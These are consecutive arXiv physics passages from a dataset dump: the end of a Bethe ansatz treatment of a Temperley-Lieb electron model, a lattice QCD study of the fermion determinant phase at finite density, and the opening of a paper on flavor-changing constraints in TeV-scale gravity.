{\cal U}\left| \Omega (N-3,N-1)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(N-3,N-1)\right\rangle +\left| \Omega (N-4,N-1)\right\rangle \nonumber \\
&&+U_{N-2}\left| \Omega (N-3,N-1)\right\rangle \label{cba30}
\end{eqnarray}
Moreover, the action of ${\cal U}_{0}$ does not depend on the
pseudoparticles are neither separated nor neighbors. It is vanishes in the
bulk
\begin{equation}
{\cal U}_{0}\left| \Omega (k_{1},k_{2})\right\rangle =0\quad \text{{\rm for}
\quad }k_{1}\neq 1\ \text{{\rm and} }k_{2}\neq N-1, \label{cba31}
\end{equation}
and different of zero at the boundaries:
\begin{eqnarray}
{\cal U}_{0}\left| \Omega (1,k_{2})\right\rangle
&=&-\sum_{k=1}^{k_{2}-2}(-Q)^{k}\left| \Omega (k,k_{2})\right\rangle
-(-Q)^{k_{2}-1}U_{k_{2}}\left| \Omega (k_{2}-1,k_{2}+1)\right\rangle \\
&&-\sum_{k=k_{2}+2}^{N-1}(-Q)^{k-2}\left| \Omega (k_{2},k)\right\rangle
\label{cba32}
\end{eqnarray}
\begin{equation}
{\cal U}_{0}\left| \Omega (k_{1},N-1)\right\rangle =(-Q)^{-N+2}\ {\cal U}%
_{0}\left| \Omega (1,k_{2})\right\rangle \label{cba33}
\end{equation}
where $2\leq k_{1}\leq N-3$ and $3\leq k_{2}\leq N-2$.
Following the same procedure of one-pseudoparticle case we again define new
states in order to have consistency between bulk and boundaries terms
\begin{eqnarray}
{\cal U}_{0}\left| \Omega (1,k_{2})\right\rangle &=&\left| \Omega
(0,k_{2})\right\rangle ,\quad {\cal U}_{0}\left| \Omega
(k_{1},N-1)\right\rangle =\left| \Omega (k_{1},N)\right\rangle \nonumber \\
{\cal U}_{0}\left| \Omega (1,N-1)\right\rangle &=&\left| \Omega
(0,N-1)\right\rangle +\left| \Omega (1,N)\right\rangle \nonumber \\
U_{k+1}\left| \Omega (k,k+2)\right\rangle &=&\left| \Omega
(k,k+1)\right\rangle +\left| \Omega (k+1,k+2)\right\rangle \label{cba34}
\end{eqnarray}
Acting with $H$ on these new states, we get
\begin{eqnarray}
H\left| \Omega (0,k_{2})\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(0,k_{2})\right\rangle +\left| \Omega (0,k_{2}-1)\right\rangle +\left|
\Omega (0,k_{2}+1)\right\rangle \nonumber \\
&&+\left| \Omega (1,k_{2})\right\rangle +(-Q)^{N-2}\left| \Omega
(k_{2},N-1)\right\rangle \label{cba35}
\end{eqnarray}
\begin{eqnarray}
H\left| \Omega (k_{1},N)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(k_{1},N)\right\rangle +\left| \Omega (k_{1}-1,N)\right\rangle +\left|
\Omega (k_{1}+1,N)\right\rangle \nonumber \\
&&+\left| \Omega (k_{1},N-1)\right\rangle +(-Q)^{-N+2}\left| \Omega
(1,k_{1})\right\rangle \label{cba36}
\end{eqnarray}
\begin{equation}
H\left| \Omega (k,k+1\right\rangle =(Q+Q^{-1})\left| \Omega
(k,k+1\right\rangle +\left| \Omega (k-1,k+1\right\rangle +\left| \Omega
(k,k+2\right\rangle \label{cba37}
\end{equation}
Substituting these results into the eigenvalue equation, we get the
following equations for wavefunctions corresponding to the separated
pseudoparticles.
\begin{eqnarray}
(E_{6}-2Q-2Q^{-1})A(k_{1},k_{2}) &=&A(k_{1}-1,k_{2})+A(k_{1}+1,k_{2})
\nonumber \\
&&+A(k_{1},k_{2}-1)+A(k_{1},k_{2}+1) \label{cba38}
\end{eqnarray}
{\it i.e}., for $k_{1}\geq 1$ and $k_{1}+3\leq k_{2}\leq N-1$. The boundary
conditions read now
\begin{equation}
A(k_{2},N+k_{1})=(-Q)^{N-2}A(k_{1},k_{2}). \label{cba39}
\end{equation}
The parametrization for the wavefunctions
\begin{equation}
A(k_{1},k_{2})=A_{12}\xi _{1}^{k_{1}}\xi _{2}^{k_{2}}+A_{21}\xi
_{1}^{k_{2}}\xi _{2}^{k_{1}} \label{cba40}
\end{equation}
solves the equation (\ref{cba38}) provided that
\begin{equation}
E_{6}=2(Q+Q^{-1})+\xi _{1}+\xi _{1}^{-1}+\xi _{2}+\xi _{2}^{-1}
\label{cba41}
\end{equation}
and the boundary conditions (\ref{cba39}) provided that
\begin{equation}
\xi _{2}^{N}=(-Q)^{N-2}\frac{A_{21}}{A_{12}}\quad ,\quad \xi
_{1}^{N}=(-Q)^{N-2}\frac{A_{12}}{A_{21}}\Rightarrow \xi ^{N}=(-Q)^{2(N-2)}
\label{cba42}
\end{equation}
where $\xi =\xi _{1}\xi _{2}=e^{i(\theta _{1}+\theta _{2})}$, $\theta
_{1}+\theta _{2}$ being the total momenta.
Now we include the new states (\ref{cba34}) into the definition of $\Psi _{6}
$ in order to extend (\ref{cba22}) to
\begin{equation}
\Psi _{6}=\sum_{k_{1}<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2}\right\rangle . \label{cba43}
\end{equation}
Here we have used the same notation for separated and neighboring states.
Substituting (\ref{cba28}) and (\ref{cba37}) into the eigenvalue equation,
we get
\begin{equation}
(E_{6}-Q-Q^{-1})A(k,k+1)=A(k-1,k+1)+A(k,k+2) \label{cba44}
\end{equation}
which gives us the phase shift produced by the interchange of the two
pseudoparticles
\begin{equation}
\frac{A_{21}}{A_{12}}=-\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi +(Q+Q^{-1})\xi
_{1}}. \label{cba45}
\end{equation}
We thus arrive to the Bethe ansatz equations which fix the values of $\xi
_{1}$ and $\xi _{2}$:
\begin{eqnarray}
\xi _{2}^{N} &=&(-Q)^{N-2}\left\{ -\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi
+(Q+Q^{-1})\xi _{1}}\right\} , \nonumber \\
\quad \xi _{1}^{N}\xi _{2}^{N} &=&(-Q)^{2(N-2)} \label{cba46}
\end{eqnarray}
Thus in the sector $r=3p$, we expect that the $p$-pseudoparticle phase shift
will be a sum of
two-pseudoparticle phase shifts and the
energy is given by
\begin{equation}
E_{3p}=\sum_{n=1}^{p}\left\{ Q+Q^{-1}+\xi _{n}+\xi _{n}^{-1}\right\}
\label{cba48}
\end{equation}
where
\[
\xi _{a}^{N}=(-Q)^{N-2p+2}\prod_{b\neq a}^{p}\left\{ -\frac{1+\xi _{a}\xi
_{b}+(Q+Q^{-1})\xi _{a}}{1+\xi _{a}\xi _{b}+(Q+Q^{-1})\xi _{b}}\right\}
,\quad a=1,...,p
\]
\begin{equation}
\left( \xi _{1}\xi _{2}\cdots \xi _{p}\right) ^{N}=(-Q)^{p(N-2p+2)}
\label{cba49}
\end{equation}
The corresponding eigenstates are
\begin{equation}
\Psi _{r}(\xi _{1},\xi _{2},...\xi _{p})=\sum_{1\leq k_{1}<...<k_{p}\leq
N-1}A(k_{1},k_{2,}...,k_{p})\left| \Omega
(k_{1},k_{2},...,k_{p})\right\rangle \label{cba49a}
\end{equation}
where $\left| \Omega (k_{1},k_{2},...,k_{p})\right\rangle =\otimes
_{i=1}^{p}\left| \Omega (k_{i})\right\rangle $ and the wavefunctions satisfy
the following boundary conditions
\begin{equation}
A(k_{1},k_{2,}...,k_{p},N+k_{1})=(-Q)^{N-2p+2}A(k_{1},k_{2,}...,k_{p})
\label{cba49b}
\end{equation}
It is not all, in a sector $r$ we may have $p$ pseudoparticles and $N_{\frac{1%
}{2}},N_{\frac{-1}{2}}$ impurities of the type $\frac{1}{2},\frac{-1}{2}$,
respectively. Since $H$ is a sum of projectors on spin zero, these states
are also annihilated by ${\cal U}_{0}$ . Therefore the impurities play here
the same role as in the periodic case. It means that for a sector $r$ with
$l$ impurities with parameters $\xi _{1},...,\xi _{l}$ and $p$ pseudoparticles
with parameters $\xi _{l+1},...,\xi _{l+p}$ the energy is given by
(\ref{cba49}), and the Bethe equations do not depend on impurity type and are
given by
\begin{equation}
\xi _{a}^{N}\xi _{1}^{2}\xi _{2}^{2}\cdots \xi
_{l}^{2}=(-1)^{l}(-Q)^{N-2p+2} \prod_{b=l+1, b\neq a}^{l+p}
\left\{
-\frac{1+\xi _{a}\xi _{b}+(Q+Q^{-1})\xi _{a}}{1+\xi _{a}\xi
_{b}+(Q+Q^{-1})\xi _{b}}\right\} \label{cba51}
\end{equation}
with $a=l+1,l+2,...,l+p\quad ,\quad p\geq 1$, and
\begin{equation}
\xi ^{2p}(\xi _{l+1}\cdots \xi _{l+p})^{N-2p}=(-1)^{l}(-Q)^{p(N-2p+2)}
\label{cba52}
\end{equation}
where $\xi =
\xi _{1}\xi _{2}\cdots \xi _{l}\xi _{l+1}\cdots \xi _{l+p}$.
Notice in the BAE (\ref{cba51}) the presence of a
special "$q$- term" $((-Q)^{N-2p+2})$ in comparsion with the
corresponding ones with usual periodic boundary conditions (\ref{pba60}).
In fact, this feature also appeared in other models
\cite{{KZ},{grosse},{foercb}}
and seems to be a peculiarity of quantum group invariant closed spin
chains.
\section{Conclusions}
We have applied the coordinate Bethe ansatz to find the
spectra of the anisotropic correlated electron system associated with
the TL algebra. This procedure was carried out for periodic and closed
boundary conditions and the differences between both cases
have been remarked.
We believe that the methods here presented could also be applied to
solve a larger class of Hamiltonians derived from representations
of the graded TL algebra, such as the orthosympletic models discussed
by Zhang in \cite{zhng}. This is presently under investigation.
Another interesting extension of this work would be to adapt the methods
employed in this paper to solve multiparametric versions of these
models. \cite{{doze},{mult}}
\vspace{1cm}
{\bf Acknowledgment:}
The support of CNPq - Conselho Nacional de
Desenvolvimento Cient\'{\i}fico e Tecnol\'ogico is gratefully
acknowledged.
A.L.S also thanks FAPESP -
Funda\c{c}\~{a}o de Amparo \`{a} Pesquisa do Estado de S\~{a}o Paulo
for financial assistance. A.F. would like to thank the Institute
f\"ur Theoretische Physik - FUB for its kind hospitality, particularly
M. Karowski. She also thanks DAAD - Deutscher Akademischer Austauschdienst
and FAPERGS - Funda\c{c}\~{a}o de Amparo \`{a} Pesquisa do Estado
do Rio Grande do Sul for financial support.
| 2024-02-18T23:40:15.004Z | 1998-10-30T20:16:27.000Z | algebraic_stack_train_0000 | 1,826 | 7,599 |
|
proofpile-arXiv_065-9111 | \section{Analytic results}
The Dirac-Kogut-Susskind operator of QCD at finite chemical potential can be
written as
\begin{equation}\label{1}
2 \Delta = 2mI + e^\mu G + e^{-\mu} G^\dagger + V
\end{equation}
\noindent
where $G$ ($G^+$) contains all forward (backward) temporal links and V all
space-like links.
The determinant of $\Delta$ in the integration
measure can be replaced, at large fermion masses $m$, by
\begin{equation}\label{2}
\det \Delta = m^{3V_sL_t}\det \left( I + \frac{e^\mu}{2m} G \right)
\end{equation}
If the fugacity $e^\mu$ is much smaller than $2m$, the second factor of (2)
can be replaced by 1 and the theory is independent of the chemical potential.
Therefore, in order to get a non trivial $\mu$ dependence, we need to go
to a region of large chemical potential in which the fugacity is of the
order of $2m$ \cite{TOUS}.
Since all space-like links have disappeared in equation (2), the determinant
of $\Delta$ factorizes as a product of $V_s$ determinants for the single
temporal chains. A straightforward calculation allow us to write
\begin{equation}\label{3}
\det \Delta = e^{3V_sL_t\mu} \prod_{i=1}^{V_s} \det (c + L_i )
\end{equation}
\noindent
with $c=({2m\over{e^\mu}})^{L_t}$, $L_t$ is the lattice
temporal extent and $L_i$
the SU(3) variable representing the forward straight Polyakov loop starting
from the spatial site $i$ and circling once the lattice in the temporal
direction. The determinants in (3) are gauge invariant quantities which can
therefore be written as functions of the trace and the determinant of $L_i$.
Since the gauge group is a unitary group, $\det(L_i)=1$
and therefore the only contributions depending on the gauge configuration
will be functions of $Tr(L_i)$. In fact simple algebra allows to write
\begin{equation}\label{4}
\det (c + L_i ) = c^3 + c^2 Tr (L_i) + c Tr (L_i^*) + 1
\end{equation}
In the infinite gauge coupling limit, the integration over the gauge group
is trivial since we get factorization \cite{LAT98}.
The final result for the partition
function at $\beta=0$ is
\begin{equation}\label{5}
{\cal Z} =
V_G e^{3V_sL_t\mu}
\left( \left(\frac{2m}{e^\mu}\right)^{3L_t} +1 \right)^{V_s}
\end{equation}
\noindent
where $V_G$ is a constant irrelevant factor diverging exponentially
with the lattice
volume which accounts for the gauge group volume. Equation (5)
gives for the free energy density $f={1\over{3V_sL_t}}\log{\cal Z}$
\begin{equation}\label{6}
f = \mu +
\frac{1}{3L_t} \log \left( \left(\frac{2m}{e^\mu}\right)^{3L_t} +1 \right)
\end{equation}
The first contribution in (6) is an analytical function of $\mu$. The second
contribution has, in the limit of infinite temporal lattice extent,
a non analyticity at $\mu_c=\log(2m)$ which induces in the number density
a step jump, indication of a saturation transition of first order at the
value of $\mu_c$ previously given.
This is an expected result on physical grounds. In fact in the infinite
fermion mass limit baryons are point-like particles, and
pion exchange interaction vanishes, since pions are also very heavy.
Therefore we are dealing with a system of very heavy free
fermions (baryons) and by increasing the
baryon density in such a system we expect an onset at
$\mu_c={1\over3}m_b$, i.e., $\mu_c=\log(2m)$ since $3\log(2m)$ is the baryon
mass at $\beta=0$ for large $m$ \cite{SACLAY}.
Let us now discuss the relevance of the phase of the
fermion determinant at $\beta=0$. The standard wisdom based on random matrix
model results is that the phase of the fermion determinant plays a fundamental
role in the thermodynamics of $QCD$ at finite baryon density \cite{RMT}
and that if
the theory is simulated by replacing the determinant by its absolute value,
one neglects a contribution to the free energy density which could be
fundamental in order to understand the critical behavior of this model.
We are going to show now that, contrary to this wisdom, the phase of the
determinant can be neglected in the large $m$ limit at $T=0$.
Equations (3) and (4) imply that an upper bound for the absolute
value of the fermion determinant is given by the determinant of the free
gauge configuration. Therefore the mean value of the phase factor in the
theory defined taking the absolute value of the determinant
\begin{equation}\label{7}
\left\langle e^{i\phi} \right\rangle_\| =
\frac{\int [dU] e^{-\beta S_G(U)}\det\Delta}
{\int [dU] e^{-\beta S_G(U)} | \det\Delta |}
\end{equation}
\noindent
is, at $\beta=0$, bounded from below by the ratio
\begin{equation}\label{8}
\left( \frac
{\left( \frac{2m}{e^\mu}\right)^{3L_t} + 1 }
{\left( \left( \frac{2m}{e^\mu}\right)^{L_t} + 1 \right)^3 }
\right)^{V_s}
\end{equation}
At zero temperature $(L_t=L, V_s=L^3)$, and letting $L\rightarrow\infty$,
it is straightforward to verify that the ratio (8)
goes to 1 except at $\mu_c=\log(2m)$
(at $\mu=\mu_c$ the ratio
goes to zero but it is bounded from below by $(1/4)^{V_s}$).
Therefore the mean value of
the cosine of the phase in the theory where the fermion determinant
is replaced by its absolute value gives zero contribution.
At $T \neq 0$, i.e. taking the infinite $V_s$ limit by keeping
fixed $L_t$, the lower bound
(8) for the mean value of the phase factor (7) goes to zero exponentially
with the spatial lattice volume $V_s$. This suggests that the
phase will contribute in finite temperature $QCD$.
In fact, it
is easy to convince oneself that expression (7), at $\beta=0$, vanishes
also exponentially with the lattice spatial volume at finite temperature
(see fig. 1).
The contribution of the phase is therefore non zero (in the limit considered
here) in simulations of $QCD$ at finite temperature.
The free energy density at finite temperature (equation (6)) is an analytic
function of the fermion mass and chemical potential. It develops a
singularity only in the limit of zero temperature $(T={1\over{L_t}})$.
Therefore $QCD$ at large $m$ and finite temperature does not show
phase transition in the
chemical potential but a crossover at $\mu=\log(2m)$ which becomes a true
first order phase transition at $T=0$.
The standard way to define the theory at zero temperature is to consider
symmetric lattices.
However a more natural way to define the theory at $T=0$
is to take the limit of finite temperature $QCD$ when the physical
temperature $T\rightarrow 0$.
In other words, we should take first the infinite spatial
volume limit and then the infinite temporal extent limit.
We will show here that, as expected, physical results are independent of
the procedure choosen.
The free energy density of the
model can be written as the sum of two contributions $f=f_1+f_2$. The first
contribution $f_1$ is the free energy density of the theory where the fermion
determinant in the integration measure is replaced by its absolute value.
The second contribution $f_2$, which comes from the phase of the fermion
determinant, can be written as
\begin{equation}\label{9}
f_2 = {1\over{V_sL_t}}\log\left\langle e^{i\phi} \right\rangle_\|.
\end{equation}
\noindent
Since the mean value of the phase factor (7) is less or equal than 1,
$f_2$ is bounded from above by zero and from below by
\begin{equation}\label{10}
{1\over{L_t}}\log{\left( \frac
{\left( \frac{2m}{e^\mu}\right)^{3L_t} + 1 }
{\left( \left( \frac{2m}{e^\mu}\right)^{L_t} + 1 \right)^3 }
\right)}
\end{equation}
When $L_t$ goes to infinity, expression (10) goes to zero for all the
values of $\mu$ and therefore the
only contribution to the free energy density which survives in the zero
temperature limit is $f_1$.
Again, we conclude that zero temperature QCD in the strong coupling
limit at finite chemical potential
and for large fermion masses is well described by the theory obtained by
replacing the fermion determinant by its absolute value.
These results are not surprising as follows from the fact that at $\beta=0$
and for large $m$ the system factorizes as a product of $V_s$ noninteracting
$0+1$ dimensional $QCD's$ and from the relevance (irrelevance) of the phase
of the fermion determinant in $0+1$ QCD at finite (zero) "temperature"
\cite{LAT97}.
More surprising maybe is that, as we will see in the following,
some of these results do not change when we put a finite gauge coupling.
The inclusion of a non trivial pure gauge Boltzmann factor in the integration
measure of the partition function breaks the factorization property. The
effect of a finite gauge coupling is to induce correlations between the
different temporal chains of the determinant of the Dirac operator. The
partition function is given by
\begin{equation}\label{11}
{\cal Z} = \int [dU] e^{-\beta S_G(U)} \prod_{i=1}^{V_s}
(c^3 + 1 + c Tr (L_i^*) + c^2 Tr (L_i) )
\end{equation}
\noindent
and can be written as
\begin{equation}
{\cal Z}(\beta,\mu) = {\cal Z}_{pg}\cdot {\cal Z}(\beta=0,\mu)\cdot
R(\beta,\mu)
\end{equation}
\noindent
where ${\cal Z}_{pg}$ is the pure gauge partition function,
${\cal Z}(\beta=0,\mu)$ the strong coupling partition function
(equation (5)) and $R(\beta,\mu)$ is given by
\begin{equation}\label{12}
R(\beta,\mu) = \frac
{\int [dU] e^{-\beta S_G(U)} \prod_{i=1}^{V_s} \left(
1 + \frac{c Tr (L_i) + c^2 Tr (L_i^*)}{c^3 + 1} \right)}
{\int [dU] e^{-\beta S_G(U)}}
\end{equation}
In the zero temperature limit ($L_t=L, L_s=L^{3}, L\rightarrow\infty$) the
productory in the numerator of (13) goes to 1 independently of the gauge
configuration. In fact each single factor has an absolute value equal to
1 up to corrections which vanish exponentially with the lattice size $L$
and a phase which vanishes also exponentially with $L$. Since the total number
of factors is $L^3$, the productory goes to 1 and therefore $R=1$ in the
zero temperature limit.
The contribution of $R$ to the free energy
density vanishes therefore in the infinite volume limit at zero temperature.
In such a case, the free energy density is the sum of the free energy density
of the pure gauge $SU(3)$ theory plus the free energy density of the model at
$\beta=0$ (equation (6)). The first order phase transition found at $\beta=0$
is also present at any $\beta$ and its location and properties do not
depend on $\beta$ since all $\beta$ dependence in the partition function
factorizes in the pure gauge contribution.
Again at finite gauge coupling
the phase of the fermion determinant is irrelevant at zero temperature.
At finite temperature and finite gauge coupling the first order phase
transition induced by the contribution (6) to the free energy density at
zero temperature disappears and becomes a crossover.
Furthermore expression (13) gives also a non vanishing contribution
to the free energy density if $L_t$ is finite.
The common physical interpretation for
the theory with the absolute value of the fermion determinant
is that it possesses
quarks in the {\bf 3} and {\bf 3}$^*$ representations of SU(3),
having baryonic states made up of two quarks which would give account for the
physical differences respect to real QCD. We have proven analytically (at
$\beta=0$) that the relation between modulus and real QCD is
temperature dependent, $i.e.$ they are different only at $T \ne 0$,
a feature that does not support the above interpretation.
\section{Numerical results}
From the point of view of simulations, work has been done by
several groups mainly to develop numerical algorithms capable to overcome
the non positivity of the fermionic determinant.
The most promising of these algorithms \cite{BAR}, \cite{NOI1}
are based on the GCPF formalism and try to calculate extensive quantities
(the canonical partition functions at fixed baryon number).
Usually they measure quantities that, with actual statistics, do not
converge.
In a previous paper \cite{NOI2} we have given arguments to conclude that,
if the phase is relevant, a statistics exponentially increasing
with the system volume
is necessary to appreciate its contribution to the observables (see also
\cite{BAR2} ).
What happens if we consider a case where the phase is not relevant
($i.e.$ the large mass limit of QCD at zero temperature, as discussed
in the previous section)?
To answer this question we have reformulated the GCPF formalism by
writing the partition function as a polynomial in
$c$ and studied the convergence properties of the coefficients at $\beta=0$
using an ensemble of (several thousands) random configurations.
This has been done as in standard numerical simulations ({\it i.e.}
without using the factorization property) for lattices $4^4$ (fig. 2a),
$4^3\times 20$ (fig. 2b), $10^3\times 4$ (fig. 2c) \cite{LAT98} and the
results compared with the analytical predictions (\ref{5}) (solid lines
in the figures).
From these plots we can see that, unless we consider a large lattice temporal
extension, our averaged coefficients in the infinite coupling limit still
suffer from sign ambiguities $i.e.$ not all of them are positive.
For large $L_t$ the {\it sign problem}
tends to disappear because the determinant of the one dimensional system
(\ref{4}) becomes an almost real quantity for each gauge configuration and
obviously the same happens to the determinant of the Dirac operator
(\ref{3}) in the four dimensional lattice.
It is also interesting to note that the sign of the averaged
coefficients is very stable and a different set of random configurations
produces almost the same shape.
However, the sign of the determinant is not the only problem: in fact,
as one can read from fig. 2, even considering the modulus of
the averaged coefficients we do not get the correct result.
We used the same configurations to calculate the average of the modulus of
the coefficients. We expect this quantity to be larger
than the analityc results reported in fig. 2.
The data, however, contrast with this scenario:
the averages of the modulus are always smaller (on a logarithmic scale)
than the analityc results from formula (\ref{5}).
In fact these averages are indistinguishable from the absolute values of
the numerical results reported in fig. 2.
In conclusion, even if the phase of the fermion
determinant is irrelevant in QCD at finite density ($T=0$ and heavy quarks)
the numerical evaluation of the Grand Canonical Partition Function
still suffers from sampling problems.
A last interesting feature which can be discussed on the light of our results
concerns the validity of the quenched approximation in finite density $QCD$.
An important amount of experience in this field \cite{KOGUT} suggests that
contrary to what happens in $QCD$ at finite and zero temperature, the quenched
approximation does not give correct results in $QCD$ at finite chemical
potential. Even if
the zero flavour limit of the theory with the absolute value of the
fermion determinant and of actual $QCD$ are the same (quenched approximation),
the failure of this approximation has been assigned in the past \cite{RMT}
to the fact that it corresponds to the zero flavour limit of the theory
with $n$ quarks in the fundamental and $n$ quarks in the complex
representation of
the gauge group. In fig. 3 we have plotted the number density at $\beta=0$ and
for heavy quarks in three interesting cases: actual $QCD$, the theory
with the absolute value of the fermion determinant and quenched $QCD$.
It is obvious that the quenched approximation produces results far from those
of actual $QCD$ but also far from those of $QCD$ with the modulus of the
determinant of the Dirac operator. The former results are furthermore very
near to those of actual $QCD$. In other words, even if the phase is relevant
at finite temperature, its contribution to the number density is almost
negligible.
It seems unplausible on the light of these results to assign the failure of
the quenched approximation to the feature previously discussed \cite{RMT}.
It seems more natural to speculate that it fails because does not
incorporate correctly in the path integral the Fermi-Dirac statistics and
we do expect that Pauli exclusion principle play, by far, a more relevant
role in finite density $QCD$ than in finite temperature $QCD$.
\vskip 0.3truecm
\noindent
{\bf Acknowledgements}
\vskip 0.3truecm
This work has been partially supported by CICYT and INFN.
\vskip 1 truecm
| 2024-02-18T23:40:15.841Z | 1998-11-26T11:23:30.000Z | algebraic_stack_train_0000 | 1,858 | 2,731 |
|
proofpile-arXiv_065-9121 | \subsection{Introduction}
One of the fundamental mysteries of the Nature
is the enormous hierarchy between the observable values of the
weak interaction scale $M_W$ and the Planck scale $M_P$.
A possible solution to this mystery \cite{add} may have to do
with the fact that the fundamental scale of gravitational interaction
$M_{Pf}$ is as low as TeV, whereas the observed weakness
of the Newtonian coupling constant $G_N \sim M_P^{-2}$ is
due to the existence of $N$ large ($ \gg {\rm TeV}^{-1}$)
extra dimensions into which the gravitational flux can spread out.
At the distances larger than the typical size of these extra dimensions
($R$) gravity goes to its standard Einstein form.
For instance, for two test masses separated by the distance
$r\gg R$, the usual $1/r^2$ Newtonian low is recovered, and
the relation between the fundamental and observed Planck scales
is given by:
\begin{equation}
M_P^2 = M_{Pf}^{N + 2}R^N
\end{equation}
In such a theory, quantum gravity becomes strong at energies $M_{Pf}$,
where presumably all the interactions must unify.\footnote{Witten suggested
\cite{witten} that string scale may be around the scale of
supersymmetric unification $\sim 10^{16} GeV$. The possibility of
having an extremely low string scale was also discussed by Lykken
\cite{lykken}.}
For all the reasonable choices of $N$, the size of extra radii is
within the experimental range in which the strong and
electroweak interactions have been probed.
Thus, unlike gravity the other observed particles should not
"see" the extra dimension (at least up to energies $\sim$ TeV).
In ref. \cite{add} this was accomplished by postulating
that all the standard model particles are confined to
a $3 + 1$-dimensional hyper-surface ($3$-brane), whereas gravity
(as it should) penetrates the extra dimensional bulk\cite{walluniverse1}-\cite{kt}.
Thus, on a very general grounds, the particle spectrum of
the theory is divided in two categories:
(1) the standard model particles living on the $3$-brane
(brane modes);
(2) gravity and other possible hypothetical particles
propagating in the bulk (bulk modes).
Since extra dimensions are compact, any $4 + N$-dimensional
bulk field represents an infinite tower of the
four-dimensional Kaluza-Klein (KK) states with masses quantized in
units of inverse radii $R^{-1}$.
An important fact is that each of these states
(viewed as a four dimensional mode) has extremely weak,
suppressed at least as $M_P^{-1}$ couplings to the brane modes.
The ordinary four-dimensional graviton, which is
nothing but a lowest KK mode of the bulk graviton, is a
simplest example. In what follows, this fact will play a
crucial role as far as the other possible bulk particles
are concerned.
Obviously, such a scenario requires various compatibility
checks many of which were performed in
\cite{add},\cite{aadd},\cite{add*},\cite{adm}\cite{ndm}\cite{giudice},\cite{ns}.
It was shown that this scenario passes a
variety of the laboratory and astrophysical tests.
Most of the analysis was mainly concerned
to check the "calculable" consequences of the theory,
ones that obviously arise and are possible
to estimate in the field (or string) theory picture.
On the other hand, there are constraints based on the
effects whose existence is impossible to proof or rule out
at the given stage of understanding the quantum gravity,
but which are usually believed to be there.
An expected violation of global quantum numbers by gravity
is an example. There are no rigorous proofs of such effect,
nor any knowledge of what their actual strength should be.
Yet, if an effect is there with a most naive dimensional
analysis we expect it to manifest itself in terms of all possible
gauge-symmetric operators suppressed by the Planck scale.
Below we adopt this philosophy, which then imposes
the severe constraints on the proposal of ref. \cite{add},
since now the fundamental gravity scale $M_{Pf}$
is as low as TeV!
Issues regarding baryon and lepton number violation
were discussed in \cite{aadd},\cite{tye}, \cite{add*} and
some ways out were suggested\footnote{The unification of gauge couplings is another
issue \cite{diduge} not to be addressed in this paper.}.
In the present paper we will discuss the flavor problem
in TeV scale quantum gravity theories induced by
higher order effective operators cutoff by the scale
$M_{Pf}$
that can contribute to various flavor-changing neutral
processes (FCNP), like $\bar K^0-K^0$ or $D^0 - \bar D^0$
transitions, $\mu \rightarrow e\gamma$ decay etc.
It is normal that the flavor-violating interactions provide
severe constraints to any new physics beyond the
standard model.\footnote{
Unlike the baryon number non-conservation,
gravity-mediated FCNP are only important for a very low scale
quantum gravity theories: the lowest dimensional
baryon-number-violating operators scaled as $M_{Pf}^{-1}$
are problematic even for theories with $M_{Pf} = M_P$,
whereas the flavor problem disappears already for
$M_{Pf} > 10^{(7-8)}$ GeV or so.}
As we will see below the flavor problem provides
severe constraints both on the symmetry structure of
the theory and on the structure of fermion mass matrixes.
\subsection{The Problematic Operators and Gauge Family Symmetries}
As said above, in the effective low energy theory below TeV, we expect all possible
flavor
violating four-fermion operators scaled by $M_{Pf}^{-2}$. Some of these give
unacceptably large contributions to the flavor changing processes and must be
adequately suppressed. Let us consider what are the symmetries that can do the
job\footnote{
$N=1$ supersymmetry can not be of much help due to the following reasons:
first in any case it must be broken around TeV scale, and secondly the four-fermion
interaction can arise from the K\"ahler metric, which can not be controlled by
holomorphy.}. Usually one of the most sensitive processes to a new flavor-violating
physics
is the $K^0 - \bar K^0$ transition. Corresponding effective operator in the present
context
would have a form
\begin{equation}
{(\bar s d)^2 \over M_{Pf}^{2}} \label{kaon}
\end{equation}
This can only be suppressed by the symmetry that acts differently on $s$ and $d$ and
therefore is a
{\it family} symmetry. Thus, as a first requirement we have to invoke a gauge family
symmetry.
In an ordinary (four-dimensional) field theory there would be an immediate problem with
this proposal. In order to adequately suppress the operator (\ref{kaon}), the
symmetry in
question
should be broken (well) below TeV. But there are well known lower bounds\cite{bounds}
$>> TeV$ on the scale of gauge flavor symmetry breaking. This bound comes
from a tree-level exchange of the horizontal gauge boson, that
will mediate the same FCNP for which the symmetry was invoked!
However, one has to remember that this is true as far as the four-dimensional field theory
is
concerned. Recall that in our case there are two type of particles, ordinary particles
living on a brane and the bulk modes. If the horizontal gauge field is the bulk mode
the situation is different. Now the coupling of each KK excitation
to the ordinary particles will be enormously suppressed.
This saves the scenario from being {\it a priory} excluded.
The large multiplicity of the
exchanged KK states however works against us and at the end puts severe
constraint on the dimensionality of extra space, flavor breaking scale and the pattern
of quark masses. We will discuss this in detail below.
Now let us discuss what are the symmetries that one can use.
In the limit of zero Yukawa couplings the standard model exhibits
an unbroken flavor symmetry group
\begin{equation}
G_F = U(3)_{Q_L}\otimes U(3)_{u_R}\otimes U(3)_{d_R}\otimes U(3)_{l_L}\otimes U(3)_{e_R}
\end{equation}
If one is going to gauge some subgroup of $G_F$,
the Yukawa coupling constants are to be understood as the
vacuum expectation values of the fields that break this
symmetry \cite{flavor}.
That is the fermion masses must be generated by the higher dimensional
operators of the form:
\begin{equation}
\left ({\chi \over M}\right )^N_{ab} H \bar Q_L^aq_R^b \label{chi}
\end{equation}
where $\chi$ are flavor-breaking Higgses.
To take advantage of the problem, it is natural
and most economical to assume that the above desired operators
are generated by the same physics which induces the problematic ones.
Thus we adopt that $M \sim M_{Pf}$.
An observed fermion mass hierarchy then
is accounted by hierarchical breaking of $G_F$.
In the present paper we will not be interested how
precisely such a hierarchy of VEVs is generated,
but rather will look for its consequences as far as FCNP are
concerned.
Now the large Yukawa coupling of the
top quark indicates that at least
$U(3)_{Q_L}\otimes U(3)_{u_R} \rightarrow
U(2)_{Q_L}\otimes U(2)_{u_R}$ breaking should occur
at the scale $\sim M_{Pf}$ and thus it can not provide any
significant suppression.
Therefore, the selection rules for the operators
that involve purely $Q_L$ and $u_R$ states can be based essentially
on $U(2)_{Q_L}\otimes U(2)_{u_R}$ symmetry or its subgroups.
The most problematic dimension six operators in this respect is
(below we will not specify explicitly a Lorenz structure,
since in each case it will be clear from the context):
\begin{equation}
